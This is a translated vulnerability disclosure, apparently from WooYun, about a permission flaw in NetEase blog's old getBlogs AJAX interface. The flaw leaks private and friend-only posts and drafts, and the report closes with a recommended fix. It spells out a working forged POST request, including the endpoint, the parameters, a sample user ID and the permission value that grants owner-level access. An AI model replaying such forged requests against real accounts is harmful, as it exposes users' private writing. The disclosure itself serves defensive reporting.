Netease blog permission check is lax, causing leakage of encrypted logs and drafts in blogs

Source: Internet
Author: User

Brief description: this vulnerability can cause leakage of encrypted logs (friend visibility, private visibility) and draft logs in users' blogs.
Detailed Description: The AJAX request interface of Netease blog Log Module transmits the user level (visitor, friend, and blogger) through URL parameters, and does not judge this parameter, by forging a request, you can immediately obtain logs that are only visible to friends or the bloggers. In addition, in any case, this interface returns the logs saved as drafts, which are not displayed only by the front-end judgment.
Proof of vulnerability: Taking blog Small tube (http://blog.163.com/blog_admin) as an example. You can obtain the UID 721279 on the homepage.
 
Initiate an http post request to the following address:
Http://api.blog.163.com/dwr/call/plaincall/BlogBean.getBlogs.dwr
 
POST parameters:
 
CallCount = 1
 
ScriptSessionId =$ {scriptSessionId} 187
 
C0-scriptName = BlogBean
 
C0-methodName = getBlogs
 
C0-id = 0
 
C0-param0: Numbers = 260
 
C0-param1: number = 20
 
C0-param2: Numbers = 721279
 
C0-param3: boolean = false
 
C0-param4: Numbers = 10000
 
C0-param5: boolean = false
 
C0-param6: boolean = false
 
BatchId = 1, 687303
 
Here, param0 and param1 are the numbers and starting points respectively (only the 260-280 logs are obtained here), param2 is the UID, param4 is the permission, and 10000 represents the blogger (highest level ).
 
The returned data is the data encapsulated by JSONP. After simple parsing, you can find that one of the headers (titles) that are not displayed in the log list is "post real, show the story-blog selfie star. Its address is ghost.
Solution: BlogBean. getBlogs. dwr is the AJAX interface in the old blog version. The new version has been upgraded to BlogBeanNew. getBlogs. dwr and does not have this vulnerability. We recommend that you delete the old interface.


Author XiNGRZ @ wooyun

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.